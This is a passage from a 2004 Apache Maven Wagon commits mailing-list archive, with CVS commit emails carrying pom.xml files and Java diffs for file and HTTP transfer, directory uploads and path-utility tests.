protected]</unsubscribe> <archive>http://[email protected]</archive> </mailingList> </mailingLists> <developers> <developer> <name>Michal Maczka</name> <id>michal</id> <email>[email protected]</email> <organization>Dimatics</organization> <roles> <role>Architect</role> </roles> </developer> </developers> <licenses> <license> <name>The Apache Software License, Version 1.1</name> <url>http://cvs.apache.org/viewcvs.cgi/*checkout*/maven/LICENSE.txt</url> <distribution>repo</distribution> </license> </licenses> <dependencies> <dependency> <groupId>plexus</groupId> <artifactId>plexus</artifactId> <version>0.14-SNAPSHOT</version> </dependency> <dependency> <groupId>xpp3</groupId> <artifactId>xpp3</artifactId> <version>161.129.204.104</version> </dependency> <dependency> <groupId>classworlds</groupId> <artifactId>classworlds</artifactId> <version>1.1-SNAPSHOT</version> </dependency> <dependency> <groupId>xstream</groupId> <artifactId>xstream</artifactId> <version>1.0-SNAPSHOT</version> </dependency> <!-- Testing --> <dependency> <groupId>maven</groupId> <artifactId>maven-model</artifactId> <version>2.0-SNAPSHOT</version> </dependency> <dependency> <groupId>junit</groupId> <artifactId>junit</artifactId> <version>3.8.1</version> </dependency> </dependencies> <build> <sourceDirectory>src/main/java</sourceDirectory> <unitTestSourceDirectory>src/test/java</unitTestSourceDirectory> <unitTest> <includes> <include>**/*Test.java</include> </includes> <resources> <resource> <directory>src/test/resources</directory> </resource> <resource> <directory>src/test/java</directory> <includes> <include>**/*.xml</include> </includes> </resource> </resources> </unitTest> <resources> <resource> <directory>src/main/resources</directory> </resource> </resources> </build> </project> 1.1 maven-wagon/wagon-ant/pom.xml Index: pom.xml =================================================================== <?xml version="1.0" encoding="UTF-8"?> <project> <parent> <groupId>maven</groupId> <artifactId>wagon</artifactId> <version>0.9-SNAPSHOT</version> </parent> <groupId>maven</groupId> <artifactId>wagon-ant</artifactId> <name>Wagon Ant</name> <currentVersion>0.9-SNAPSHOT</currentVersion> <description></description> <shortDescription>Tools to manage artifacts and deployment</shortDescription> <package>org.apache.maven.wagon.ant</package> <inceptionYear>2003</inceptionYear> <dependencies> <dependency> <groupId>plexus</groupId> <artifactId>plexus</artifactId> <version>0.14-SNAPSHOT</version> </dependency> <dependency> <groupId>xpp3</groupId> <artifactId>xpp3</artifactId> <version>161.129.204.104</version> </dependency> <dependency> <groupId>classworlds</groupId> <artifactId>classworlds</artifactId> <version>1.1-SNAPSHOT</version> </dependency> <dependency> <groupId>xstream</groupId> <artifactId>xstream</artifactId> <version>1.0-SNAPSHOT</version> </dependency> <dependency> <groupId>maven</groupId> <artifactId>wagon-api</artifactId> <version>0.9-SNAPSHOT</version> </dependency> <!-- Ant --> <dependency> <groupId>ant</groupId> <artifactId>ant</artifactId> <version>1.6</version> </dependency> <dependency> <groupId>ant</groupId> <artifactId>ant-launcher</artifactId> <version>1.6</version> </dependency> </dependencies> <build> <sourceDirectory>src/main/java</sourceDirectory> <unitTestSourceDirectory>src/test/java</unitTestSourceDirectory> <unitTest> <includes> <include>**/*Test.java</include> </includes> <resources> <resource> <directory>src/test/resources</directory> </resource> <resource> <directory>src/test/java</directory> <includes> <include>**/*.xml</include> </includes> </resource> </resources> </unitTest> <resources> <resource> <directory>src/main/resources</directory> </resource> </resources> </build> </project> 1.1 maven-wagon/wagon-api/pom.xml Index: pom.xml =================================================================== <?xml version="1.0" encoding="UTF-8"?> <project> <parent> <groupId>maven</groupId> <artifactId>wagon</artifactId> <version>0.9-SNAPSHOT</version> </parent> <groupId>maven</groupId> <artifactId>wagon-api</artifactId> <name>Wagon API</name> <version>0.9-SNAPSHOT</version> <description></description> <shortDescription>Tools to manage artifacts and deployment</shortDescription> <description> Wagon in general utility resource transport framework. The Wagon API defines the interfaces, clasess and their respective roles. </description> <package>org.apache.maven.wagon</package> <inceptionYear>2003</inceptionYear> <url>http://maven.apache.org/wagon/wagon-api</url> <issueTrackingUrl>http://jira.codehaus.org/BrowseProject.jspa?id=10319</issueTrackingUrl> <developers> <developer> <name>Michal Maczka</name> <id>michal</id> <email>[email protected]</email> <organization>Dimatics</organization> <roles> <role>Architect</role> </roles> </developer> <developer> <name>Jason van Zyl</name> <id>jvanzyl</id> <email>[email protected]</email> <roles> <role>Developer</role> </roles> </developer> </developers> </project> 1.8 +6 -4 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/WagonTestCase.java Index: WagonTestCase.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/WagonTestCase.java,v retrieving revision 1.7 retrieving revision 1.8 diff -u -r1.7 -r1.8 --- WagonTestCase.java 3 Jun 2004 18:27:00 -0000 1.7 +++ WagonTestCase.java 9 Jun 2004 03:11:22 -0000 1.8 @@ -39,6 +39,8 @@ public abstract class WagonTestCase extends PlexusTestCase { + protected static String POM = "pom.xml"; + protected Repository localRepository; protected Repository testRepository; @@ -217,7 +219,7 @@ wagon.connect( testRepository ); - sourceFile = new File( basedir, "project.xml" ); + sourceFile = new File( basedir, POM ); wagon.put( sourceFile, resource ); @@ -287,7 +289,7 @@ wagon.connect( testRepository ); - artifactSourceFile = new File( basedir, "project.xml" ); + artifactSourceFile = new File( basedir, POM ); wagon.put( artifactSourceFile, getTestArtifact() ); @@ -355,7 +357,7 @@ { if ( artifact == null ) { - //Model model = modelReader.read( new FileReader( new File( basedir, "project.xml" ) ) ); + //Model model = modelReader.read( new FileReader( new File( basedir, POM ) ) ); artifact = new DefaultArtifact( "groupId", "artifactId", "1.0", "pom" ); } 1.5 +8 -2 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/AbstractWagonTest.java Index: AbstractWagonTest.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/AbstractWagonTest.java,v retrieving revision 1.4 retrieving revision 1.5 diff -u -r1.4 -r1.5 --- AbstractWagonTest.java 3 Jun 2004 18:27:01 -0000 1.4 +++ AbstractWagonTest.java 9 Jun 2004 03:11:22 -0000 1.5 @@ -35,11 +35,17 @@ public class AbstractWagonTest extends TestCase { private String basedir; + private MockWagon wagon = null; + private Artifact artifact; + private File destination; + private File source; + private MockSessionListener sessionListener = null; + private MockTransferListener transferListener = null; protected void setUp() throws Exception @@ -52,7 +58,7 @@ destination = new File( basedir, "target/folder/subfolder" ); - source = new File( basedir, "project.xml" ); + source = new File( basedir, "pom.xml" ); wagon = new MockWagon(); 1.1 maven-wagon/wagon-providers/ftp/pom.xml Index: pom.xml =================================================================== <?xml version="1.0" encoding="UTF-8"?> <project> <parent> <groupId>maven</groupId> <artifactId>wagon</artifactId> <version>0.9-SNAPSHOT</version> </parent> <groupId>maven</groupId> <artifactId>wagon-ftp</artifactId> <name>Wagon FTP Provider</name> <version>0.9-SNAPSHOT</version> <description></description> <shortDescription>Provider for FTP protocol for Wagon</shortDescription> <package>org.apache.maven.wagon.providers.ftp</package> <inceptionYear>2003</inceptionYear> <url>http://maven.apache.org/wagon/wagon-providers/ftp</url> <issueTrackingUrl>http://jira.codehaus.org/BrowseProject.jspa?id=10319</issueTrackingUrl> <siteDirectory>/www/maven.apache.org/wagon/wagon-providers/ftp</siteDirectory> <repository> <connection>scm:cvs:pserver:[email protected]:/home/cvspublic:maven-wagon/wagon-providers/ftp</connection> <url>http://cvs.apache.org/viewcvs/maven-wagon/wagon-providers/ftp/</url> </repository> <developers> <developer> <name>Michal Maczka</name> <id>michal</id> <email>[email protected]</email> <organization>Dimatics</organization> <roles> <role>Creator</role> <role>Developer</role> <role>Release Manager</role> </roles> </developer> </developers> <dependencies> <dependency> <groupId>maven</groupId> <artifactId>wagon-api</artifactId> <version>0.9-SNAPSHOT</version> </dependency> <dependency> <groupId>commons-net</groupId> <artifactId>commons-net</artifactId> <version>1.1.0</version> </dependency> <!-- Embedded Ftp Server --> <dependency> <groupId>plexus</groupId> <artifactId>plexus-ftp</artifactId> <version>1.0-SNAPSHOT</version> </dependency> <dependency> <groupId>avalon</groupId> <artifactId>avalon-framework</artifactId> <version>4.1.4</version> </dependency> <dependency> <groupId>cornerstone-threads</groupId> <artifactId>cornerstone-threads-api</artifactId> <version>1.0</version> </dependency> <dependency> <groupId>cornerstone-threads</groupId> <artifactId>cornerstone-threads-impl</artifactId> <version>1.0</version> </dependency> <dependency> <groupId>excalibur-thread</groupId> <artifactId>excalibur-thread</artifactId> <version>1.1.1</version> </dependency> <dependency> <groupId>excalibur-pool</groupId> <artifactId>excalibur-pool-api</artifactId> <version>2.0</version> </dependency> <dependency> <groupId>excalibur-pool</groupId> <artifactId>excalibur-pool-impl</artifactId> <version>2.0</version> </dependency> <dependency> <groupId>cornerstone-connection</groupId> <artifactId>cornerstone-connection-api</artifactId> <version>1.0</version> </dependency> <dependency> <groupId>cornerstone-connection</groupId> <artifactId>cornerstone-connection-impl</artifactId> <version>1.0</version> </dependency> <dependency> <groupId>cornerstone-sockets</groupId> <artifactId>cornerstone-sockets-api</artifactId> <version>1.0</version> </dependency> <dependency> <groupId>cornerstone-sockets</groupId> <artifactId>cornerstone-sockets-impl</artifactId> <version>1.0</version> </dependency> <dependency> <groupId>concurrent</groupId> <artifactId>concurrent</artifactId> <version>1.3.2</version> </dependency> <dependency> <groupId>plexus</groupId> <artifactId>plexus-avalon-personality</artifactId> <version>0.12</version> </dependency> <dependency> <groupId>commons-collections</groupId> <artifactId>commons-collections</artifactId> <version>3.0</version> </dependency> </dependencies> </project> 1.1 maven-wagon/wagon-providers/http/pom.xml Index: pom.xml =================================================================== <?xml version="1.0" encoding="UTF-8"?> <project> <parent> <groupId>maven</groupId> <artifactId>wagon</artifactId> <version>0.9-SNAPSHOT</version> </parent> <groupId>maven</groupId> <artifactId>wagon-http</artifactId> <name>Wagon HTTP provider</name> <version>0.9-SNAPSHOT</version> <shortDescription>Wagon Provider for HTTP/HTTPS protocols based on jakarta-commons-httpclient</shortDescription> <package>org.apache.maven.wagon.providers.http</package> <inceptionYear>2003</inceptionYear> <url>http://maven.apache.org/wagon/wagon-providers/http</url> <issueTrackingUrl>http://jira.codehaus.org/BrowseProject.jspa?id=10319</issueTrackingUrl> <siteDirectory>/www/maven.apache.org/wagon/wagon-providers/http</siteDirectory> <developers> <developer> <name>Michal Maczka</name> <id>michal</id> <email>[email protected]</email> <organization>Dimatics</organization> <roles> <role>Creator</role> <role>Developer</role> <role>Release Manager</role> </roles> </developer> </developers> <dependencies> <dependency> <groupId>maven</groupId> <artifactId>wagon-api</artifactId> <version>0.9-SNAPSHOT</version> </dependency> <dependency> <groupId>commons-httpclient</groupId> <artifactId>commons-httpclient</artifactId> <version>2.0-rc2</version> <type>jar</type> </dependency> <dependency> <groupId>commons-logging</groupId> <artifactId>commons-logging</artifactId> <version>1.0.3</version> <type>jar</type> </dependency> <dependency> <groupId>commons-lang</groupId> <artifactId>commons-lang</artifactId> <version>1.0.1</version> <type>jar</type> </dependency> <!-- Testing --> <dependency> <groupId>plexus</groupId> <artifactId>plexus-jetty-httpd</artifactId> <version>1.0-SNAPSHOT</version> </dependency> <dependency> <groupId>jetty</groupId> <artifactId>jetty</artifactId> <version>4.2.10</version> </dependency> <dependency> <groupId>servletapi</groupId> <artifactId>servletapi</artifactId> <version>2.3</version> </dependency> </dependencies> </project> 1.1 maven-wagon/wagon-providers/ssh/pom.xml Index: pom.xml =================================================================== <?xml version="1.0" encoding="UTF-8"?> <project> <parent> <groupId>maven</groupId> <artifactId>wagon</artifactId> <version>0.9-SNAPSHOT</version> </parent> <groupId>maven</groupId> <artifactId>wagon-ssh</artifactId> <name>Wagon SSH provider</name> <version>0.9-SNAPSHOT</version> <description></description> <shortDescription>Wagon Provider for protocols from SSH2 family based on JSCH</shortDescription> <package>org.apache.maven.wagon.providers.ssh</package> <inceptionYear>2003</inceptionYear> <developers> <developer> <name>Michal Maczka</name> <id>michal</id> <email>[email protected]</email> <organization>Dimatics</organization> <roles> <role>Creator</role> <role>Developer</role> <role>Release Manager</role> </roles> </developer> </developers> <dependencies> <dependency> <groupId>maven</groupId> <artifactId>wagon-api</artifactId> <version>0.9-SNAPSHOT</version> <type>jar</type> </dependency> <dependency> <groupId>jsch</groupId> <artifactId>jsch</artifactId> <version>0.1.14</version> <type>jar</type> </dependency> </dependencies> </project> --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Jun 09 19:36:12 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 27856 invoked from network); 9 Jun 2004 19:36:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 9 Jun 2004 19:36:12 -0000 Received: (qmail 92188 invoked by uid 500); 9 Jun 2004 19:36:26 -0000 Delivered-To: [email protected] Received: (qmail 92167 invoked by uid 500); 9 Jun 2004 19:36:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 92148 invoked by uid 99); 9 Jun 2004 19:36:25 -0000 Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Wed, 09 Jun 2004 12:36:25 -0700 Received: (qmail 27851 invoked by uid 1668); 9 Jun 2004 19:36:10 -0000 Date: 9 Jun 2004 19:36:10 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/providers/file FileWagon.java X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N michal 2004/06/09 12:36:10 Modified: wagon-api/src/main/java/org/apache/maven/wagon/providers/file FileWagon.java Log: more specific exception is thrown Revision Changes Path 1.6 +9 -3 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/providers/file/FileWagon.java Index: FileWagon.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/providers/file/FileWagon.java,v retrieving revision 1.5 retrieving revision 1.6 diff -u -r1.5 -r1.6 --- FileWagon.java 3 Jun 2004 18:26:59 -0000 1.5 +++ FileWagon.java 9 Jun 2004 19:36:10 -0000 1.6 @@ -20,6 +20,7 @@ import org.apache.maven.wagon.LazyFileOutputStream; import org.apache.maven.wagon.StreamWagon; import org.apache.maven.wagon.TransferFailedException; +import org.apache.maven.wagon.ResourceDoesNotExistException; import java.io.File; import java.io.FileInputStream; @@ -39,11 +40,16 @@ // get public InputStream getInputStream( String resource ) - throws TransferFailedException + throws TransferFailedException, ResourceDoesNotExistException { File f = new File( getRepository().getBasedir(), resource ); - + + if ( !f.exists() ) + { + throw new ResourceDoesNotExistException( "File: " + f + " does not exists" ); + } + try { return new FileInputStream( f ); --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Jun 19 14:16:26 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 3343 invoked from network); 19 Jun 2004 14:16:26 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 19 Jun 2004 14:16:26 -0000 Received: (qmail 97277 invoked by uid 500); 19 Jun 2004 14:16:26 -0000 Delivered-To: [email protected] Received: (qmail 97221 invoked by uid 500); 19 Jun 2004 14:16:25 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 97186 invoked by uid 99); 19 Jun 2004 14:16:24 -0000 Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Sat, 19 Jun 2004 07:16:24 -0700 Received: (qmail 3329 invoked by uid 1668); 19 Jun 2004 14:16:21 -0000 Date: 19 Jun 2004 14:16:21 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon PathUtilsTest.java X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N michal 2004/06/19 07:16:21 Modified: wagon-api/src/main/java/org/apache/maven/wagon/providers/file FileWagon.java wagon-api/src/main/java/org/apache/maven/wagon WagonTestCase.java WagonUtils.java wagon-api/src/test/java/org/apache/maven/wagon PathUtilsTest.java Log: added utility method for executing "put" operation for entire directory. This will be useful for deployment of websites Revision Changes Path 1.7 +6 -3 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/providers/file/FileWagon.java Index: FileWagon.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/providers/file/FileWagon.java,v retrieving revision 1.6 retrieving revision 1.7 diff -u -r1.6 -r1.7 --- FileWagon.java 9 Jun 2004 19:36:10 -0000 1.6 +++ FileWagon.java 19 Jun 2004 14:16:21 -0000 1.7 @@ -66,9 +66,12 @@ File f = new File( getRepository().getBasedir(), resource ); - if ( f.getParentFile() != null && !f.getParentFile().exists() ) + File dir = f.getParentFile(); + + if ( dir != null && !dir.exists() ) { - if ( !f.getParentFile().mkdirs() ) + + if ( !dir.mkdirs() ) { String msg = "Some of the requied directories do not exist and could not be create. " + "Requested path: " + f.getAbsolutePath(); 1.9 +3 -1 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/WagonTestCase.java Index: WagonTestCase.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/WagonTestCase.java,v retrieving revision 1.8 retrieving revision 1.9 diff -u -r1.8 -r1.9 --- WagonTestCase.java 9 Jun 2004 03:11:22 -0000 1.8 +++ WagonTestCase.java 19 Jun 2004 14:16:21 -0000 1.9 @@ -178,7 +178,9 @@ private void message( String message ) { System.out.println( "---------------------------------------------------------------------------------------------------------" ); + System.out.println( message ); + System.out.println( "---------------------------------------------------------------------------------------------------------" ); } 1.4 +65 -3 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/WagonUtils.java Index: WagonUtils.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/WagonUtils.java,v retrieving revision 1.3 retrieving revision 1.4 diff -u -r1.3 -r1.4 --- WagonUtils.java 3 Jun 2004 18:27:00 -0000 1.3 +++ WagonUtils.java 19 Jun 2004 14:16:21 -0000 1.4 @@ -22,6 +22,8 @@ import java.io.File; import java.io.IOException; +import java.util.LinkedList; +import java.util.List; /** @@ -94,6 +96,66 @@ } - - + + + public static void putDirectory( File dir, Wagon wagon, boolean includeBasdir ) + throws ResourceDoesNotExistException, TransferFailedException, AuthorizationException + { + + LinkedList queue = new LinkedList(); + + if ( includeBasdir ) + { + queue.add( dir.getName() ); + } + else + { + queue.add( "" ); + } + + while ( !queue.isEmpty() ) + { + + String path = ( String ) queue.removeFirst(); + + + File currentDir = new File ( dir, path); + + System.out.println( "Processing dir: " + currentDir ); + + File[] files = currentDir.listFiles(); + + for (int i = 0; i < files.length; i++) + { + File file = files[i]; + + System.out.println( "Processing file: " + file ); + + String resource; + + if ( path.length() > 0 ) + { + resource = path + "/" + file.getName(); + } + else + { + resource = file.getName(); + + } + + if ( file.isDirectory() ) + { + queue.add( resource ); + } + else + { + wagon.put( file, resource ); + } + + } + + } + + } + } 1.3 +11 -1 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/PathUtilsTest.java Index: PathUtilsTest.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/PathUtilsTest.java,v retrieving revision 1.2 retrieving revision 1.3 diff -u -r1.2 -r1.3 --- PathUtilsTest.java 3 Jun 2004 18:27:01 -0000 1.2 +++ PathUtilsTest.java 19 Jun 2004 14:16:21 -0000 1.3 @@ -28,24 +28,33 @@ public void testFilenameResolving() { assertEquals( "filename", PathUtils.filename( "dir/filename" ) ); + assertEquals( "filename", PathUtils.filename( "filename" ) ); + assertEquals( "filename", PathUtils.filename( "dir1/dir2/filename" ) ); } public void testDirResolving() { assertEquals( "dir", PathUtils.dirname( "dir/filename" ) ); + assertEquals( "", PathUtils.dirname( "filename" ) ); + assertEquals( "dir1/dir2", PathUtils.dirname( "dir1/dir2/filename" ) ); } public void testDirSpliting() { final String path = "a/b/c"; + final String[] dirs = PathUtils.dirnames( path ); + assertNotNull( dirs ); + assertEquals( 2, dirs.length ); + assertEquals( "a", dirs[0] ); + assertEquals( "b", dirs[1] ); } @@ -55,6 +64,7 @@ assertEquals( "www.codehaus.org", PathUtils.host( "http://www.codehaus.org" ) ); + assertEquals( "localhost", PathUtils.host( null ) ); } --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sat Jun 19 21:48:10 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 85763 invoked from network); 19 Jun 2004 21:48:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 19 Jun 2004 21:48:10 -0000 Received: (qmail 79352 invoked by uid 500); 19 Jun 2004 21:48:12 -0000 Delivered-To: [email protected] Received: (qmail 79309 invoked by uid 500); 19 Jun 2004 21:48:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 79283 invoked by uid 99); 19 Jun 2004 21:48:11 -0000 Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Sat, 19 Jun 2004 14:48:11 -0700 Received: (qmail 85749 invoked by uid 1668); 19 Jun 2004 21:48:04 -0000 Date: 19 Jun 2004 21:48:04 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon/wagon-providers/http/src/main/java/org/apache/maven/wagon/providers/http HttpWagon.java X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N michal 2004/06/19 14:48:04 Modified: wagon-providers/http/src/main/java/org/apache/maven/wagon/providers/http HttpWagon.java Log: required dirs are created now Revision Changes Path 1.9 +18 -1 maven-wagon/wagon-providers/http/src/main/java/org/apache/maven/wagon/providers/http/HttpWagon.java Index: HttpWagon.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-providers/http/src/main/java/org/apache/maven/wagon/providers/http/HttpWagon.java,v retrieving revision 1.8 retrieving revision 1.9 diff -u -r1.8 -r1.9 --- HttpWagon.java 3 Jun 2004 18:31:26 -0000 1.8 +++ HttpWagon.java 19 Jun 2004 21:48:04 -0000 1.9 @@ -285,6 +285,23 @@ InputStream is = null; + + File dir = destination.getParentFile(); + + if ( dir != null && !dir.exists() ) + { + if ( ! dir.mkdirs() ) + { + + String msg = "Some of the required local directories do not exist and could not be created. " + + "Requested local path: " + destination.getAbsolutePath(); + + throw new TransferFailedException( msg ); + } + + } + + try { os = new LazyFileOutputStream( destination ); --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sun Jun 20 11:44:59 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 20716 invoked from network); 20 Jun 2004 11:44:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 20 Jun 2004 11:44:58 -0000 Received: (qmail 98936 invoked by uid 500); 20 Jun 2004 11:44:59 -0000 Delivered-To: [email protected] Received: (qmail 98919 invoked by uid 500); 20 Jun 2004 11:44:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 98906 invoked by uid 99); 20 Jun 2004 11:44:58 -0000 Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.27.1) with SMTP; Sun, 20 Jun 2004 04:44:58 -0700 Received: (qmail 20707 invoked by uid 1668); 20 Jun 2004 11:44:57 -0000 Date: 20 Jun 2004 11:44:57 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon WagonUtilsTest.java X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N michal 2004/06/20 04:44:57 Added: wagon-api/src/test/java/org/apache/maven/wagon WagonUtilsTest.java Log: tests of WagonUtils Revision Changes Path 1.1 maven-wagon/wagon-api/src/test/java/org/apache/maven/wagon/WagonUtilsTest.java Index: WagonUtilsTest.java =================================================================== package org.apache.maven.wagon; /* ==================================================================== * Copyright 2001-2004 The Apache Software Foundation. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * ==================================================================== */ import junit.framework.TestCase; import org.apache.maven.wagon.PathUtils; import org.apache.maven.wagon.WagonConstants; import org.apache.maven.wagon.repository.Repository; import org.apache.maven.wagon.observers.Debug; import org.apache.maven.wagon.providers.file.FileWagon; import org.codehaus.plexus.util.FileUtils; import java.io.File; import java.io.IOException; import java.util.List; /** * @author <a href="[email protected]">Michal Maczka</a> * @version $Id: WagonUtilsTest.java,v 1.1 2004/06/20 11:44:57 michal Exp $ */ public class WagonUtilsTest extends TestCase { public void testPutDirectory() { try { File inputDir = FileTestUtils.createUniqueDir( "inputDir" ); File dirA = new File( inputDir, "a" ); dirA.mkdirs(); File fileA = new File( dirA, "a.txt" ); FileUtils.fileWrite( fileA.getPath(), "a" ); File dirAA = new File( dirA, "aa" ); dirAA.mkdir(); File fileAA = new File( dirAA, "aa.txt" ); FileUtils.fileWrite( fileAA.getPath(), "aa" ); File dirB = new File( inputDir, "b" ); dirB.mkdir(); File fileB = new File( dirB, "b.txt" ); FileUtils.fileWrite( fileB.getPath(), "b" ); File outputDir = FileTestUtils.createUniqueDir( "outputDir" ); Wagon wagon = new FileWagon(); Debug debug = new Debug(); wagon.addTransferListener( debug ); wagon.addSessionListener( debug ); Repository repository = new Repository(); repository.setUrl( "file://" +outputDir ); wagon.connect( repository ); WagonUtils.putDirectory( inputDir, wagon, false ); List inputFiles = FileUtils.getFiles( inputDir, "**/*", null, false ); List outputFiles = FileUtils.getFiles( outputDir, "**/*", null, false ); assertEquals( inputFiles.size(), outputFiles.size() ); } catch ( Exception e ) { e.printStackTrace(); fail( e.getMessage() ); } } } --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Sun Jun 20 18:14:04 2004 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 76743 invoked from network); 20 Jun 2004 18:14:04 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 20 Jun 2004 18:14:04 -0000 Received: (qmail 97005 invoked by uid 500); 20 Jun 2004 18:14:06 -0000 Delivered-To: [email protected] Received: (qmail 96988 invoked by uid 500); 20 Jun 2004 18:14:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Delivered-To: mailing list [email protected] Delivered-To: moderator for [email protected] Received: (qmail 6335 invoked by uid 99); 20 Jun 2004 15:25:30 -0000 Date: 20 Jun 2004 15:25:28 -0000 Message-ID: <[email protected]> From: [email protected] To: [email protected] Subject: cvs commit: maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon WagonTestCase.java X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N trygvis 2004/06/20 08:25:28 Modified: wagon-api/src/main/java/org/apache/maven/wagon WagonTestCase.java Log: o Removed the creation of directories within the repository, only create the repository itself. Revision Changes Path 1.10 +8 -21 maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/WagonTestCase.java Index: WagonTestCase.java =================================================================== RCS file: /home/cvs/maven-wagon/wagon-api/src/main/java/org/apache/maven/wagon/WagonTestCase.java,v retrieving revision 1.9 retrieving revision 1.10 diff -u -r1.9 -r1.10 --- WagonTestCase.java 19 Jun 2004 14:16:21 -0000 1.9 +++ WagonTestCase.java 20 Jun 2004 15:25:28 -0000 1.10 @@ -17,21 +17,19 @@ * ==================================================================== */ +import java.io.File; +import java.io.IOException; + import org.apache.maven.wagon.artifact.Artifact; import org.apache.maven.wagon.artifact.DefaultArtifact; -import org.apache.maven.wagon.observers.Debug; +import org.apache.maven.wagon.authentication.AuthenticationInfo; import org.apache.maven.wagon.observers.ChecksumObserver; +import org.apache.maven.wagon.observers.Debug; import org.apache.maven.wagon.repository.Repository; -import org.apache.maven.wagon.authentication.AuthenticationInfo; + import org.codehaus.plexus.PlexusTestCase; import org.codehaus.plexus.util.FileUtils; -import java.io.File; -import java.io.FileWriter; -import java.io.IOException; -import java.io.Writer; -import java.io.FileReader; - /** * @author <a href="mailto:[email protected]">Jason van Zyl</a> * @version $Id$ @@ -67,8 +65,6 @@ // Constructors // ---------------------------------------------------------------------- - - public WagonTestCase( String testName ) { super( testName ); @@ -96,7 +92,6 @@ protected void setupRepositories() throws Exception { - resource = "test-resource.txt"; //modelReader = new MavenXpp3Reader(); @@ -121,14 +116,7 @@ message( "Local repository: " + localRepository ); - File f = new File( localRepositoryPath, "/maven/jars" ); - - if ( !f.exists() ) - { - f.mkdirs(); - } - - f = new File( 